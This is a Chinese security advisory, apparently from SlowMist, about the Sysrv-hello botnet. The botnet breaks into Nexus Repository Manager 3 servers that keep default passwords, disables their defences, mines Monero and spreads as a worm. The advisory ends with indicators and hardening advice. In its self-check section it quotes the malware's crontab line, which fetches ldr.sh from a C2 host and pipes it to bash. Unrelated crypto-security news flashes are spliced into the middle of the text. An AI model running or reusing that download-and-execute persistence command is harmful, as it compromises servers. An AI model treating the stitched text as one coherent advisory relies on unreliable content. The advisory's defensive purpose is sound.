攻击路径
Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。
当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。
慢雾:已冻结部分BitKeep黑客转移资金:12月26日消息,慢雾安全团队在社交媒体上发文表示,正在对 BitKeep 钱包进行深入调查,并已冻结部分黑客转移资金。[2022/12/26 22:08:58]
入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴
慢雾: 警惕比特币RBF风险:据BitMEX消息,比特币于区块高度666833出现陈腐区块,并产生了一笔 0.00062063 BTC 的双花交易。根据 BitMEX提供的交易内容来看,双花的两笔交易的nSequence字段的值都小于0xffffffff -1。慢雾安全团队初步认为此次双花交易有可能是比特币中的RBF交易。[2021/1/20 16:38:01]
第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务
声音 | 慢雾:警惕“假充值”攻击:慢雾分析预警,如果数字货币交易所、钱包等平台在进行“EOS 充值交易确认是否成功”的判断存在缺陷,可能导致严重的“假充值”。攻击者可以在未损失任何 EOS 的前提下成功向这些平台充值 EOS,而且这些 EOS 可以进行正常交易。
慢雾安全团队已经确认真实攻击发生,但需要注意的是:EOS 这次假充值攻击和之前慢雾安全团队披露过的 USDT 假充值、以太坊代币假充值类似,更多责任应该属于平台方。由于这是一种新型攻击手法,且攻击已经在发生,相关平台方如果对自己的充值校验没有十足把握,应尽快暂停 EOS 充提,并对账自查。[2019/3/12]
自查方法
进程:network01sysrv
文件:/tmp/network01/tmp/sysrv/tmp/flag.txt
crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-
端口:52013
存在以上这些,停止备份样本后删除。
加固建议
删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。
本文来源于非小号媒体平台:
慢雾科技
现已在非小号资讯平台发布68篇作品,
非小号开放平台欢迎币圈作者入驻
入驻指南:
/apply_guide/
本文网址:
/news/9606255.html
免责声明:
1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险
2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场
上一篇:
深入解析MakeDao在新周期里的机遇和风险
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。